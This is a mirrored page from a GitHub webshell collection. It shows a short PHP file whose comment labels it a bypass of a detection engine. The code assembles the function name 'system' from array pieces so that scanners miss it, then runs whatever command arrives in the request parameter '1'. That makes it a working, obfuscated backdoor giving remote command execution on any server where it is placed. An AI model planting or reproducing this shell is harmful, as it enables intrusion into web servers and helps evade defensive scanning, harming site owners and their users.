mirror of
https://github.com/tennc/webshell
synced 2025-02-16 17:58:23 +00:00
6 lines
152 B
PHP
6 lines
152 B
PHP
<?php
|
|
//ASRC伏魔引擎bypass
|
|
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
|
|
$a = join($result);
|
|
array_map($a,(array)$_REQUEST['1']);
|
|
?>
|